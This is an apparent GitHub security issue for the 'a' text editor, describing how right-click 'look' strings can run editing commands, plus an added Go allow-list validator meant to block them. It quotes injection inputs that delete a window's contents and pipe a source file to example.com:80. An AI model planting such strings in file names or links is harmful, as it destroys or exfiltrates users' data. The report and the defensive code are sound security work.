as / a

A graphical text editor
BSD 3-Clause "New" or "Revised" License
345 stars 25 forks

a: security: look command injection #83

Open as opened 6 years ago

as commented 6 years ago

Right clicking opens look.go in a new window, selects all bytes in the window, and deletes them.

C:\g\src\github.com\as\a\look.go:,d

Although command execution is possible with button 2, it is unexpected with look. An adversary could construct a chain of commands in this form:

C:\g\src\github.com\as\a\look.go:,|dial example.com:80

This transmits the contents of look.go to the remote endpoint, and replaces the contents of the window with the remote server's reply. However, the user would have to highlight the entire string themselves, since look won't expand past the pipe character.

The real issue is the ability to use commands like w and r to write and read the files on disk unexpectedly.
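The mitigation a reader of this report would want to see is a check that runs before the editor acts on a right-clicked `file:address` string: accept the address part only if it is a plain positioning address, and refuse it otherwise. The following Go program is an added example written for this page, not code from the `a` editor or its author; `SplitLook`, `SafeLook` and the address grammar in `simpleAddr` are assumptions made here and are not the project's API. The grammar admits Acme-style line and rune numbers, `.`, `$`, regexp searches and ranges of those, so the `,d`, `,|dial ...`, `w` and `r` forms described above all fail the check and the file would be opened without applying the address.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// simpleAddr is one Acme-style simple address: an absolute or relative line or
// rune number (12, +3, #0), "." (dot), "$" (end of file), or a regexp search
// such as /func main/ or ?foo?.  The grammar is an assumption for this example
// and deliberately contains nothing that edits or executes.
const simpleAddr = `(?:[+-]?#?\d+|\.|\$|/(?:[^/\\\n]|\\.)*/|\?(?:[^?\\\n]|\\.)*\?)`

// safeAddr accepts an empty address, one simple address, or a range of up to two
// simple addresses joined by "," or ";".  A trailing command such as the "d" in
// ",d" or the "|dial ..." in ",|dial example.com:80" does not fit and is rejected.
var safeAddr = regexp.MustCompile(`^` + simpleAddr + `?(?:[,;]` + simpleAddr + `?)?$`)

// SplitLook splits a look target into file path and address at the first ':'
// that is not a Windows drive-letter colon, so `C:\src\look.go:,d` becomes
// (`C:\src\look.go`, ",d") and a host:port inside the address stays in the address.
func SplitLook(target string) (path, addr string) {
	start := 0
	if len(target) > 2 && target[1] == ':' && (target[2] == '\\' || target[2] == '/') {
		start = 2 // skip the drive-letter colon in "C:\" or "C:/"
	}
	i := strings.Index(target[start:], ":")
	if i < 0 {
		return target, ""
	}
	i += start
	return target[:i], target[i+1:]
}

// SafeLook reports whether target is a plain file:address pair whose address
// only positions the selection.  ok is false when the address part carries an
// editing command, a pipe, or anything else outside the address grammar; a
// caller would then open the file without applying the address.
func SafeLook(target string) (path, addr string, ok bool) {
	path, addr = SplitLook(target)
	return path, addr, safeAddr.MatchString(addr)
}

func main() {
	// Constructed inputs modelled on the strings quoted in the issue.
	for _, t := range []string{
		`C:\g\src\github.com\as\a\look.go:,d`,
		`C:\g\src\github.com\as\a\look.go:,|dial example.com:80`,
		`C:\g\src\github.com\as\a\look.go:12`,
		`/home/user/look.go:/func main/,$`,
	} {
		path, addr, ok := SafeLook(t)
		fmt.Printf("ok=%-5v path=%q addr=%q\n", ok, path, addr)
	}
}
```

Splitting at the first non-drive colon rather than the last matters: with a last-colon split, the `:80` in the piped example would become the address and the command would hide inside the "path". An allow-list over the address grammar is also preferable to a deny-list of command letters, since any future command the editor grows is rejected by default.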